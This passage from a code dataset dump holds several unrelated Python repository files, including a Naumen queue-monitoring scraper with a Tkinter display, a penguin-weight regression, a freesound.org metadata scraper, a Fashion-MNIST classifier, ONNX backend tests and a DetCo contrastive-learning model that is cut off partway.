\"box_precision\": box_precision, \"box_recall\": box_recall, \"class_recall\": class_recall,\n \"AP\": AP}\n\n","repo_name":"DeadmanIQ445/maskrcnn_v2","sub_path":".ipynb_checkpoints/evaluation-checkpoint.py","file_name":"evaluation-checkpoint.py","file_ext":"py","file_size_in_byte":6201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"30075145503","text":"from requests.adapters import HTTPAdapter\n#from requests.packages.urllib3.util.retry import Retry\nfrom urllib3.util import Retry\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport re\nimport tkinter as tk\nlogin = 'login'\npassword = 'password'\n\ndef requests_retry_session(\n retries=30,\n backoff_factor=0.3,\n status_forcelist=(500, 502, 504),\n session=None,\n):\n session = session or requests.Session()\n retry = Retry(\n total=retries,\n read=retries,\n connect=retries,\n backoff_factor=backoff_factor,\n status_forcelist=status_forcelist,\n )\n adapter = HTTPAdapter(max_retries=retry)\n session.mount('http://', adapter)\n session.mount('https://', adapter)\n return session\n\n\ndef get_html(url):\n headers = {\n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'\n }\n\n values = {'login': login,\n 'password': password\n }\n with requests.Session() as sesh:\n #response = requests_retry_session(session=s).get('https://www.peterbe.com')\n r = requests_retry_session(session=sesh).get(url, headers=headers)\n r = requests_retry_session(session=sesh).post(url, data=values)\n r = requests_retry_session(session=sesh).get(\"http://172.11.1.11:8080/published?uuid=fctsListView\")\n return r.text\n\ndef bs4Soup(html):\n soup = BeautifulSoup(html, 'lxml')\n html_list = soup.find_all('span')\n list1 = []\n dicct = {}\n for i in html_list:\n list = re.findall(r'[А-яA-z]+|[0-9]+', i.text)\n txt = \" \".join(list)\n if \"СПБ\" in txt or txt.isdigit() == True:\n list1.append(txt)\n\n print(len(list1))\n print(list1)\n\n for y in range(1,60,3):\n try:\n dicct[list1[y]] = list1[y+1]\n except:\n pass\n\n string = \"\"\n global amount\n amount = 0\n for key in dicct:\n dicct[key] = int(dicct[key])\n amount 
+= dicct[key]\n        print(key + \" - \" + str(dicct[key]))\n        print(key.replace(\"СПБ\", \"\").replace('МЕД', '').replace(\"Очередь\", '').replace('проекта', '')\\\n              .replace('1', '').replace('2', '').replace('3', '').strip() + \" - \" + str(dicct[key]))\n        string += key.replace(\"СПБ\", \"\").replace('МЕД', '').replace(\"медицинская\", \"мед.\").replace(\"Консультация\", \"Конс.\").replace(\"приложению\", \"прил.\").replace(\"Очередь\", '').replace('проекта', '')\\\n              .replace('1', '').replace(\"Общая очередь Xup\", \"Xoup\").replace('2', '').replace('3', '').strip() + \" - \" + str(dicct[key]) + \"\\n\"\n        #string += key.replace(\"Общая очередь Xoup\", 'Xoup')\n    return string + \"\\n\" + \"Всего - \" + str(amount)\n\ndef main():\n    url = \"http://172.11.1.11:8080/\"\n    bs4Soup(get_html(url))\n\ndef Draw():\n    global text\n    frame=tk.Frame(window,width=1000,height=1000,bd=100,bg ='#a9aeb0')\n    frame.place(relx=.5, rely=.5, anchor=\"center\")\n    text=tk.Label(window)\n    text.pack(fill = 'both', expand=True)\n\ndef Refresher():\n    url = \"http://172.11.1.11:8080/\"\n    global text\n    try:\n        if int(bs4Soup(get_html(url))[-4:]) > 50:\n            bg = '#eb6788'\n        elif int(bs4Soup(get_html(url))[-4:]) > 70:\n            bg = '#e3869d'\n        else:\n            #bg = '#333333'\n            bg = '#a9aeb0'\n    except:\n        #bg = '#333333'\n        bg = '#a9aeb0'\n    text.configure(text=bs4Soup(get_html(url)), font=(\"Verdana\", 55, \"bold\"), fg=\"black\", bg=bg)\n    #fg='#CCCCCC'\n    window.after(5000, Refresher) # every 5 seconds...\n\nwindow = tk.Tk()\nwindow.title(\"Гарант\")\nwindow.geometry(\"518x170\")\nwindow.configure(background='#333333')\n#window.configure(background='#a9aeb0')\nwindow.wm_attributes('-fullscreen', True) # Windows\n#window.attributes('-zoomed', True)\n\nDraw()\nRefresher()\nwindow.mainloop()\n","repo_name":"Mythological/Python-BS4-ParseNaumen","sub_path":"NaumenQueue.py","file_name":"NaumenQueue.py","file_ext":"py","file_size_in_byte":3947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73777961439","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import KFold\n\ntrain_data = pd.read_csv('dataset/train.csv')\ntest_data = pd.read_csv('dataset/test.csv')\n\n# function that checks for missing values\ndef check_missing_col(dataframe):\n    missing_col = []\n    counted_missing_col = 0\n    for i, col in enumerate(dataframe.columns):\n        missing_values = sum(dataframe[col].isna())\n        is_missing = True if missing_values >= 1 else False\n        if is_missing:\n            counted_missing_col += 1\n            print(f'Column with missing values: {col}')\n            print(f'That column contains a total of {missing_values} missing values')\n            missing_col.append([col, dataframe[col].dtype])\n    if counted_missing_col == 0:\n        print('There are no missing values.')\n    return missing_col\n\n# inspect the data\ntrain_missing_col = check_missing_col(train_data)\n\ntrain_preprocessed = train_data.dropna(subset=['Sex'])\ntrain_preprocessed = train_preprocessed.fillna(0)\n\ntrain_missing_col = check_missing_col(train_preprocessed)\n\ndef make_label_map(dataframe):\n    label_maps = {}\n    for col in dataframe.columns:\n        if dataframe[col].dtype == 'object':\n            label_map = {'unknown':0}\n            for i, key in enumerate(train_data[col].unique()):\n                label_map[key] = i + 1\n            label_maps[col] = label_map\n    return label_maps\n\ndef label_encoder(dataframe, label_map):\n    for col in dataframe.columns:\n        if dataframe[col].dtype == 'object':\n            dataframe[col] = dataframe[col].map(label_map[col])\n            dataframe[col] = dataframe[col].fillna(label_map[col]['unknown'])\n    return dataframe\n\nlabel_map = 
make_label_map(train_preprocessed)\nlabeled_train = label_encoder(train_preprocessed, label_map)\n\nprint(label_map)\n\ndef RMSE(true, pred):\n    score = np.sqrt(np.mean(np.square(true-pred)))\n    return score\n\ntarget = labeled_train[\"Body Mass (g)\"]\nfeature = labeled_train.drop(['id', 'Body Mass (g)'], axis=1)\n\nlr = LinearRegression()\n\nkfold = KFold(n_splits=5)\n\ncv_rmse = [] # create a list to hold the RMSE score of each CV round; used later to take the mean of the RMSE values.\nn_iter = 0 # initialize the iteration count; used in the print statements below to tell the cross-validation rounds apart.\n\n# since K is 5, this loop runs five times.\nfor train_index, test_index in kfold.split(feature): # split the feature data into the number of folds set above; the split is returned as index values.\n    x_train, x_test = feature.iloc[train_index], feature.iloc[test_index] # select the values to use as features according to the split indices.\n    y_train, y_test = target.iloc[train_index], target.iloc[test_index] # select the values to use as labels according to the split indices.\n\n    lr = lr.fit(x_train, y_train) # train the model\n    pred = lr.predict(x_test) # predict on the test set\n    n_iter += 1 # increment the iteration count by one\n\n    error = RMSE(y_test, pred) # compute the RMSE score.\n    train_size = x_train.shape[0] # training data size\n    test_size = x_test.shape[0] # validation data size\n\n    print('\\nCV round {0} RMSE : {1}, training data size : {2}, validation data size : {3}'\n          .format(n_iter, error, train_size, test_size))\n    print('Validation set indices for round {0} : {1}'.format(n_iter, test_index))\n    cv_rmse.append(error)\n\nprint('\\n==> The average error (RMSE) of this equation is {}.'.format(np.mean(cv_rmse))) # check the model's average accuracy.\n\ntest_missing_col = check_missing_col(test_data)\n\ntest_data['Sex'] = test_data['Sex'].fillna(\"MALE\")\ntest_preprocessed = test_data.fillna(0)\n\ntest_missing_col = check_missing_col(test_preprocessed)\n\nlabeled_test = label_encoder(test_preprocessed, label_map)\n\nlabeled_test = labeled_test.drop(['id'], axis=1)\n\npredict_test = lr.predict(labeled_test)\nprint(predict_test)\n\nsubmission = pd.read_csv('dataset/sample_submission.csv')\nsubmission['Body Mass (g)'] = predict_test\n\nsubmission.to_csv(\"submission.csv\", index=False)","repo_name":"dntjq0815/Penguins_Weight_Prediction","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4248,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"69983564640","text":"from os import getcwd, rename, remove, makedirs\nfrom os.path import isfile, exists\nfrom pathlib import Path\n\n\ndef validar_diretorio_downloads():\n\n    diretorio = str(Path(getcwd(), 'downloads'))\n\n    if not exists(diretorio):\n        makedirs(diretorio)\n\n\ndef retornar_full_path_downloads():\n\n    return str(Path(getcwd(), 'downloads'))\n\n\ndef renomear_download(cnes):\n\n    caminho_arquivos = str(Path(getcwd(), 'downloads'))\n    nome_antigo = str(Path(caminho_arquivos, 'fichaCompletaEstabelecimento.pdf'))\n\n    if isfile(nome_antigo):\n\n        nome_atual = cnes + '.pdf'\n        nome_novo = str(Path(caminho_arquivos, nome_atual))\n\n        try:\n            rename(nome_antigo, nome_novo)\n        except Exception:\n            remove(nome_antigo)\n","repo_name":"lleooNS/PRIME_ROBOT_CHALLENGE","sub_path":"libraries/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"32083456460","text":"from webscrapper_class_freesound import get_page_number as PG\nfrom webscrapper_class_freesound import get_page_content as GC\nfrom credentials import USERNAME, PASSWORD, host, db_user, db_password, db_name\nfrom webscrapper_class_freesound import sample_more_search_result as SR\nfrom webscrapper_class_freesound import get_sound_link 
as SL\nfrom pprint import pprint as p\nfrom webscrapper_class_freesound import sample_page_number as SM\nfrom webscrapper_class_freesound import get_file_meta as FM\nfrom webscrapper_mysql_libraries_freesound import *\n\ndb = connection(host, db_user, db_password, db_name)\n\nif check_table_if_exists(db) == 1146:\n    create_table(db)\nelse:\n    print('Table already exists!')\n\npage_nr = PG('https://www.freesound.org/search/?q=&page=1#sound')\n\npage_nr = int(page_nr)\n\nprint(page_nr)\n\ncurr_page = input(\"Page number to start!\")\ncurr_page = int(curr_page)\n\nerror_link_array = []\n\ndef mainLoop(curr_page):\n\n    while curr_page <= page_nr:\n\n        try:\n            print(str(curr_page) + ' -> current page')\n\n            page_content = GC('https://www.freesound.org/search/?q=&page=' + str(curr_page) + '#sound',\n                              error_link_array)\n\n            sample_links = SR('https://www.freesound.org/search/?q=&page=' + str(curr_page) + '#sound')\n\n            sample_content = []\n\n            sound_array = []\n\n            for sam in sample_links:\n                if SM(sam) is not None:\n                    page_size = int(SM(sam))\n                else:\n                    page_size = 1\n\n                print(str(page_size) + ' -> number of pages')\n\n                curr_sample_page = 1\n\n                while curr_sample_page <= page_size:\n                    sample_content.append(\n                        GC(sam + '&advanced=&page=' + str(curr_sample_page) + '#sound', error_link_array))\n                    curr_sample_page += 1\n\n            if page_content is not None:\n                sound_array.append(SL(page_content))\n\n            for sound in sample_content:\n                if sound is not None:\n                    sound_array.append(SL(sound))\n\n            for ss in sound_array:\n                if ss is not None:\n                    for sounds in ss:\n                        meta_data = FM(sounds)\n                        insert_into_table(db, meta_data)\n        except:\n            print(curr_page)\n            continue\n\n        curr_page += 1\n\nmainLoop(curr_page)\n\ndestroy_connection(db)","repo_name":"terror2012/music_scrapper","sub_path":"webscrapper_main_freesound.py","file_name":"webscrapper_main_freesound.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"8604030826","text":"# -*-coding: utf-8-*-\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport tensorflow as tf\nfrom tensorflow import keras\n\nprint(tf.__version__)\n\n\n# load the official dataset; download speed depends on the network environment\ndef load_fashion_mnist():\n    fashion_mnist = keras.datasets.fashion_mnist\n    (train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()\n\n    # explore the data\n    print('train_images_shape:', train_images.shape)\n    print('train_labels:', train_labels)\n    print('train_labels_length:', len(train_labels))\n    print('test_images_shape:', test_images.shape)\n    print('test_images_length:', len(test_labels))\n\n    # normalize\n    train_images = train_images / 255.0\n    test_images = test_images / 255.0\n\n    return train_images, train_labels, test_images, test_labels\n\n\ndef build_model():\n    # build the model with the Keras API provided by TensorFlow 2.0\n    model = keras.Sequential([\n        keras.layers.Flatten(input_shape=(28, 28)),\n        keras.layers.Dense(128, activation='relu'),\n        keras.layers.Dense(10, activation='softmax')\n    ])\n\n    model.compile(optimizer='adam',\n                  loss='sparse_categorical_crossentropy',\n                  metrics=['accuracy'])\n\n    return model\n\n\nif __name__ == \"__main__\":\n    # label classes of the dataset\n    class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',\n                   'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\n    # path where the model is saved\n    OUTPUT_PATH = '/home/output'\n    # batch size\n    BATCH_SIZE = 64\n    # number of epochs\n    EPOCHS = 10\n\n    # load the data\n    train_images, train_labels, test_images, test_labels = load_fashion_mnist()\n\n    # build the model\n    model = build_model()\n\n    # train\n    
model.fit(train_images, train_labels, epochs=EPOCHS, batch_size=BATCH_SIZE)\n\n    # evaluate the model\n    test_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)\n    print('\\n Test accuracy:', test_acc)\n\n    # save the model\n    model.save(OUTPUT_PATH)\n","repo_name":"aefuimn/TensorFlow2.0-Tutorial","sub_path":"classify_images/classify_images_of_clothing.py","file_name":"classify_images_of_clothing.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"41172420349","text":"try:\n    import onnx.backend.test\nexcept ImportError:\n    raise ImportError(\"Onnx and protobuf need to be installed\")\n\nimport test_cases\nimport unittest\nimport backend as mxnet_backend\nimport logging\n\noperations = ['import', 'export']\nbackends = ['mxnet', 'gluon']\n# This is a pytest magic variable to load extra plugins\npytest_plugins = \"onnx.backend.test.report\",\n\n\ndef test_suite(backend_tests):  # type: () -> unittest.TestSuite\n    '''\n    TestSuite that can be run by TestRunner\n    This has been borrowed from onnx/onnx/backend/test/runner/__init__.py,\n    since Python3 cannot sort objects of type 'Type' as Runner.test_suite()\n    expects.\n    '''\n    suite = unittest.TestSuite()\n    for case in backend_tests.test_cases.values():\n        suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(case))\n    return suite\n\n\ndef prepare_tests(backend, oper):\n    \"\"\"\n    Prepare the test list\n    :param backend: mxnet/gluon backend\n    :param oper: str. export or import\n    :return: backend test list\n    \"\"\"\n    BACKEND_TESTS = onnx.backend.test.BackendTest(backend, __name__)\n    implemented_ops = test_cases.IMPLEMENTED_OPERATORS_TEST.get('both', []) + \\\n                      test_cases.IMPLEMENTED_OPERATORS_TEST.get(oper, [])\n\n    for op_test in implemented_ops:\n        BACKEND_TESTS.include(op_test)\n\n    basic_models = test_cases.BASIC_MODEL_TESTS.get('both', []) + \\\n                   test_cases.BASIC_MODEL_TESTS.get(oper, [])\n\n    for basic_model_test in basic_models:\n        BACKEND_TESTS.include(basic_model_test)\n\n    std_models = test_cases.STANDARD_MODEL.get('both', []) + \\\n                 test_cases.STANDARD_MODEL.get(oper, [])\n\n    for std_model_test in std_models:\n        BACKEND_TESTS.include(std_model_test)\n\n    # Tests for scalar ops are in test_node.py\n    BACKEND_TESTS.exclude('.*scalar.*')\n\n    return BACKEND_TESTS\n\n\nfor bkend in backends:\n    for operation in operations:\n        log = logging.getLogger(bkend + operation)\n        if bkend == 'gluon' and operation == 'export':\n            log.warning('Gluon->ONNX export not implemented. 
Skipping tests...')\n            continue\n        log.info('Executing tests for ' + bkend + ' backend: ' + operation)\n        mxnet_backend.MXNetBackend.set_params(bkend, operation)\n        BACKEND_TESTS = prepare_tests(mxnet_backend, operation)\n        unittest.TextTestRunner().run(test_suite(BACKEND_TESTS.enable_report()))\n","repo_name":"hpi-xnor/BMXNet-v2","sub_path":"tests/python-pytest/onnx/backend_test.py","file_name":"backend_test.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":225,"dataset":"github-code","pt":"51"} +{"seq_id":"10561646089","text":"import math\nimport time\nimport SIM868\n\n\nSIM = SIM868.SIM868()\nSIM.write(\"AT+CGNSPWR=1\")\nSIM.write(\"AT+CGNSURC=1\")\n\nn_cont = \"y\"\nwhile n_cont != \"n\":\n    SIM.get()\n    n_cont = input(\"continue?\")\n\nCommand = input(\"command: \")\nwhile Command != \"\":\n    SIM.write(Command)\n    Command = input(\"command: \")\n\n# AT+CGNSURC\n","repo_name":"Tysseract/RPi-GPS-Tracker","sub_path":"WindowsDebug.py","file_name":"WindowsDebug.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"71707229277","text":"import sys\n\ndef _red(txt):\n    RED=\"\\x1b[1;31m\"\n    NORMAL=\"\\x1b[0m\"\n    return RED + txt + NORMAL\n\nparts = sys.stdin.readline().strip().split()\nbranch = parts.pop(0).ljust(10)\npath = parts.pop(-1)\nflags = ' '.join(parts)\nclean = (flags == '0 0 0 0 0 0')\n\nline=\"%s %s %s\" % ( flags, branch, path )\n\nif clean:\n    print(line)\nelse:\n    print(_red(line))\n","repo_name":"bryanhann/.local.bin","sub_path":"lib/fixline.py","file_name":"fixline.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"827302744","text":"# -*- coding: utf-8 -*-\n\nfrom collective.documentgenerator.adapters import GenerablePODTemplatesAdapter\n\nfrom plone import api\n\n\nclass GenerableDashboardPODTemplatesAdapter(GenerablePODTemplatesAdapter):\n    \"\"\" \"\"\"\n    def __init__(self, context):\n        self.context = context\n\n    def get_all_pod_templates(self):\n        catalog = api.portal.get_tool(name='portal_catalog')\n        brains = catalog.unrestrictedSearchResults(portal_type=\"DashboardPODTemplate\", sort_on='getObjPositionInParent')\n        pod_templates = [self.context.unrestrictedTraverse(brain.getPath()) for brain in brains]\n\n        return pod_templates\n","repo_name":"IMIO/Products.urban","sub_path":"src/Products/urban/docgen/adapter.py","file_name":"adapter.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"24620575887","text":"import torch\nimport torch.nn as nn\n\nfrom openselfsup.utils import print_log\n\nfrom . 
import builder\nfrom .registry import MODELS\n\n\n@MODELS.register_module\nclass DetCo(nn.Module):\n '''MOCO.\n Part of the code is borrowed from:\n \"https://github.com/facebookresearch/moco/blob/master/moco/builder.py\".\n '''\n\n def __init__(self,\n backbone,\n neck_1=None,\n neck_2=None,\n neck_3=None,\n neck_4=None,\n neck_p1=None,\n neck_p2=None,\n neck_p3=None,\n neck_p4=None,\n head=None,\n pretrained=None,\n queue_len=65536,\n feat_dim=128,\n momentum=0.999,\n **kwargs):\n super(DetCo, self).__init__()\n self.backbone_q = builder.build_backbone(backbone)\n self.backbone_k = builder.build_backbone(backbone)\n self.encoder_q_necks = nn.Sequential(builder.build_neck(neck_1),\n builder.build_neck(neck_2),\n builder.build_neck(neck_3),\n builder.build_neck(neck_4))\n self.encoder_k_necks = nn.Sequential(builder.build_neck(neck_1),\n builder.build_neck(neck_2),\n builder.build_neck(neck_3),\n builder.build_neck(neck_4))\n self.encoder_q_patch_necks = nn.Sequential(builder.build_neck(neck_p1),\n builder.build_neck(neck_p2),\n builder.build_neck(neck_p3),\n builder.build_neck(neck_p4))\n self.encoder_k_patch_necks = nn.Sequential(builder.build_neck(neck_p1),\n builder.build_neck(neck_p2),\n builder.build_neck(neck_p3),\n builder.build_neck(neck_p4))\n # self.backbone = self.encoder_q[0]\n for param in self.backbone_k.parameters():\n param.requires_grad = False\n for param in self.encoder_k_necks.parameters():\n param.requires_grad = False\n for param in self.encoder_k_patch_necks.parameters():\n param.requires_grad = False\n self.head = builder.build_head(head)\n self.init_weights(pretrained=pretrained)\n\n self.queue_len = queue_len\n self.momentum = momentum\n\n # create the queue\n self.register_buffer(\"queue_2\", torch.randn(feat_dim, queue_len))\n self.queue_2 = nn.functional.normalize(self.queue_2, dim=0)\n self.register_buffer(\"queue_3\", torch.randn(feat_dim, queue_len))\n self.queue_3 = nn.functional.normalize(self.queue_3, dim=0)\n self.register_buffer(\"queue_4\", torch.randn(feat_dim, queue_len))\n self.queue_4 = nn.functional.normalize(self.queue_4, dim=0)\n self.register_buffer(\"queue_5\", torch.randn(feat_dim, queue_len))\n self.queue_5 = nn.functional.normalize(self.queue_5, dim=0)\n self.register_buffer(\"local_queue_2\", torch.randn(feat_dim, queue_len))\n self.local_queue_2 = nn.functional.normalize(self.local_queue_2, dim=0)\n self.register_buffer(\"local_queue_3\", torch.randn(feat_dim, queue_len))\n self.local_queue_3 = nn.functional.normalize(self.local_queue_3, dim=0)\n self.register_buffer(\"local_queue_4\", torch.randn(feat_dim, queue_len))\n self.local_queue_4 = nn.functional.normalize(self.local_queue_4, dim=0)\n self.register_buffer(\"local_queue_5\", torch.randn(feat_dim, queue_len))\n self.local_queue_5 = nn.functional.normalize(self.local_queue_5, dim=0)\n self.register_buffer(\"queue_ptr\", torch.zeros(1, dtype=torch.long))\n # self.register_buffer(\"local_queue_ptr\", torch.zeros(1, dtype=torch.long))\n\n def init_weights(self, pretrained=None):\n if pretrained is not None:\n print_log('load model from: {}'.format(pretrained), logger='root')\n self.backbone_q.init_weights(pretrained=pretrained)\n self.backbone_k.init_weights(pretrained=pretrained)\n for neck in self.encoder_q_necks:\n neck.init_weights(init_linear='kaiming')\n for neck in self.encoder_k_necks:\n neck.init_weights(init_linear='kaiming')\n for neck in self.encoder_q_patch_necks:\n neck.init_weights(init_linear='kaiming')\n for neck in self.encoder_k_patch_necks:\n 
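# key-side patch necks receive the same kaiming init; they are frozen\n            # (requires_grad is set False in __init__) and afterwards change only\n            # through the momentum update in _momentum_update_key_encoder\n            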
neck.init_weights(init_linear='kaiming')\n\n \"\"\"for param_q, param_k in zip(self.encoder_q.parameters(),\n self.encoder_k.parameters()):\n param_k.data.copy_(param_q.data)\"\"\"\n\n @torch.no_grad()\n def _momentum_update_key_encoder(self):\n \"\"\"\n Momentum update of the key encoder\n \"\"\"\n \"\"\"for param_q, param_k in zip(self.encoder_q.parameters(),\n self.encoder_k.parameters()):\n param_k.data = param_k.data * self.momentum + \\\n param_q.data * (1. - self.momentum)\"\"\"\n for param_q, param_k in zip(self.backbone_q.parameters(), self.backbone_k.parameters()):\n param_k.data = param_k.data * self.momentum + \\\n param_q.data * (1. - self.momentum)\n for param_q, param_k in zip(self.encoder_q_necks.parameters(), self.encoder_k_necks.parameters()):\n param_k.data = param_k.data * self.momentum + \\\n param_q.data * (1. - self.momentum)\n for param_q, param_k in zip(self.encoder_q_patch_necks.parameters(), self.encoder_k_patch_necks.parameters()):\n param_k.data = param_k.data * self.momentum + \\\n param_q.data * (1. - self.momentum)\n\n\n @torch.no_grad()\n def _dequeue_and_enqueue(self, k_2, k_3, k_4, k_5, k_l_2, k_l_3, k_l_4, k_l_5):\n # gather keys before updating queue\n keys_2 = concat_all_gather(k_2)\n keys_3 = concat_all_gather(k_3)\n keys_4 = concat_all_gather(k_4)\n keys_5 = concat_all_gather(k_5)\n local_keys_2 = concat_all_gather(k_l_2)\n local_keys_3 = concat_all_gather(k_l_3)\n local_keys_4 = concat_all_gather(k_l_4)\n local_keys_5 = concat_all_gather(k_l_5)\n\n batch_size = keys_2.shape[0]\n\n ptr = int(self.queue_ptr)\n # local_ptr = int(self.local_queue_ptr)\n assert self.queue_len % batch_size == 0 # for simplicity\n\n # replace the keys at ptr (dequeue and enqueue)\n self.queue_2[:, ptr:ptr + batch_size] = keys_2.transpose(0, 1)\n self.queue_3[:, ptr:ptr + batch_size] = keys_3.transpose(0, 1)\n self.queue_4[:, ptr:ptr + batch_size] = keys_4.transpose(0, 1)\n self.queue_5[:, ptr:ptr + batch_size] = keys_5.transpose(0, 1)\n self.local_queue_2[:, ptr:ptr + batch_size] = local_keys_2.transpose(0, 1)\n self.local_queue_3[:, ptr:ptr + batch_size] = local_keys_3.transpose(0, 1)\n self.local_queue_4[:, ptr:ptr + batch_size] = local_keys_4.transpose(0, 1)\n self.local_queue_5[:, ptr:ptr + batch_size] = local_keys_5.transpose(0, 1)\n ptr = (ptr + batch_size) % self.queue_len # move pointer\n # local_ptr = (local_ptr + batch_size) % self.queue_len # move pointer\n self.queue_ptr[0] = ptr\n # self.local_queue_ptr[0] = local_ptr\n\n @torch.no_grad()\n def _batch_shuffle_ddp(self, x, x_patch):\n \"\"\"\n Batch shuffle, for making use of BatchNorm.\n *** Only support DistributedDataParallel (DDP) model. 
***\n \"\"\"\n # gather from all gpus\n batch_size_this = x.shape[0]\n x_gather = concat_all_gather(x)\n batch_size_all = x_gather.shape[0]\n # x_patch_gather = concat_all_gather(x_patch.view(-1, 9, x_patch.size(1), x_patch.size(2), x_patch.size(3)))\n x_patch_gather = concat_all_gather(torch.cat([patch.unsqueeze(0) for patch in x_patch.split(9, dim=0)], dim=0))\n\n num_gpus = batch_size_all // batch_size_this\n\n # random shuffle index\n idx_shuffle = torch.randperm(batch_size_all).cuda()\n\n # broadcast to all gpus\n torch.distributed.broadcast(idx_shuffle, src=0)\n\n # index for restoring\n idx_unshuffle = torch.argsort(idx_shuffle)\n\n # shuffled index for this gpu\n gpu_idx = torch.distributed.get_rank()\n idx_this = idx_shuffle.view(num_gpus, -1)[gpu_idx]\n\n return x_gather[idx_this], \\\n torch.cat([q.squeeze() for q in x_patch_gather[idx_this].split(1, dim=0)], dim=0), \\\n idx_unshuffle\n\n @torch.no_grad()\n def _batch_unshuffle_ddp(self, x, x_patch, idx_unshuffle):\n \"\"\"\n Undo batch shuffle.\n *** Only support DistributedDataParallel (DDP) model. ***\n \"\"\"\n # gather from all gpus\n batch_size_this = x.shape[0]\n x_gather = concat_all_gather(x)\n batch_size_all = x_gather.shape[0]\n # x_patch_gather = concat_all_gather(x_patch.view(-1, 9, x_patch.size(1), x_patch.size(2), x_patch.size(3)))\n x_patch_gather = concat_all_gather(torch.cat([patch.unsqueeze(0) for patch in x_patch.split(9, dim=0)], dim=0))\n\n num_gpus = batch_size_all // batch_size_this\n\n # restored index for this gpu\n gpu_idx = torch.distributed.get_rank()\n idx_this = idx_unshuffle.view(num_gpus, -1)[gpu_idx]\n\n return x_gather[idx_this], \\\n torch.cat([q.squeeze() for q in x_patch_gather[idx_this].split(1, dim=0)], dim=0)\n\n def forward_train(self, img, patch, **kwargs):\n assert img.dim() == 5, \\\n \"Input must have 5 dims, got: {}\".format(img.dim())\n im_q = img[:, 0, ...].contiguous()\n im_k = img[:, 1, ...].contiguous()\n patch_q = torch.cat([p.squeeze() for p in patch[:, 0, ...].contiguous().split(1, dim=0)], dim=0)\n patch_k = torch.cat([p.squeeze() for p in patch[:, 1, ...].contiguous().split(1, dim=0)], dim=0)\n # compute query features\n q_2, q_3, q_4, q_5 = self.backbone_q(im_q) # queries: NxC\n q_2 = nn.functional.normalize(self.encoder_q_necks[0](q_2)[0], dim=1)\n q_3 = nn.functional.normalize(self.encoder_q_necks[1](q_3)[0], dim=1)\n q_4 = nn.functional.normalize(self.encoder_q_necks[2](q_4)[0], dim=1)\n q_5 = nn.functional.normalize(self.encoder_q_necks[3](q_5)[0], dim=1)\n p_q_2, p_q_3, p_q_4, p_q_5 = self.backbone_q(patch_q)\n # p_q_2 = nn.functional.normalize(self.encoder_q_patch_neck2(p_q_2), dim=1)\n def temp(x):\n z = []\n for p in x.split(9, dim=0):\n y = []\n for q in p.split(1, dim=0):\n y.append(q.squeeze())\n z.append(torch.cat(y, dim=0).unsqueeze(0))\n return z\n q_l_2 = nn.functional.normalize(self.encoder_q_patch_necks[0](torch.cat(temp(p_q_2), dim=0))[0], dim=1)\n q_l_3 = nn.functional.normalize(self.encoder_q_patch_necks[1](torch.cat(temp(p_q_3), dim=0))[0], dim=1)\n q_l_4 = nn.functional.normalize(self.encoder_q_patch_necks[2](torch.cat(temp(p_q_4), dim=0))[0], dim=1)\n q_l_5 = nn.functional.normalize(self.encoder_q_patch_necks[3](torch.cat(temp(p_q_5), dim=0))[0], dim=1)\n # q_l_2 = nn.functional.normalize(self.encoder_q_patch_necks[0](p_q_2.view(-1, 9 * p_q_2.size(1), p_q_2.size(2), p_q_2.size(3)))[0], dim=1)\n # q_l_3 = nn.functional.normalize(self.encoder_q_patch_necks[1](p_q_3.view(-1, 9 * p_q_3.size(1), p_q_3.size(2), p_q_3.size(3)))[0], dim=1)\n # q_l_4 = 
nn.functional.normalize(self.encoder_q_patch_necks[2](p_q_4.view(-1, 9 * p_q_4.size(1), p_q_4.size(2), p_q_4.size(3)))[0], dim=1)\n # q_l_5 = nn.functional.normalize(self.encoder_q_patch_necks[3](p_q_5.view(-1, 9 * p_q_5.size(1), p_q_5.size(2), p_q_5.size(3)))[0], dim=1)\n\n\n # compute key features\n with torch.no_grad(): # no gradient to keys\n self._momentum_update_key_encoder() # update the key encoder\n\n # shuffle for making use of BN\n im_k, patch_k, idx_unshuffle = self._batch_shuffle_ddp(im_k, patch_k)\n\n k_2, k_3, k_4, k_5 = self.backbone_k(im_k) # keys: NxC\n k_2 = nn.functional.normalize(self.encoder_k_necks[0](k_2)[0], dim=1)\n k_3 = nn.functional.normalize(self.encoder_k_necks[1](k_3)[0], dim=1)\n k_4 = nn.functional.normalize(self.encoder_k_necks[2](k_4)[0], dim=1)\n k_5 = nn.functional.normalize(self.encoder_k_necks[3](k_5)[0], dim=1)\n\n p_k_2, p_k_3, p_k_4, p_k_5 = self.backbone_k(patch_k)\n k_l_2 = nn.functional.normalize(self.encoder_k_patch_necks[0](torch.cat(temp(p_k_2), dim=0))[0], dim=1)\n k_l_3 = 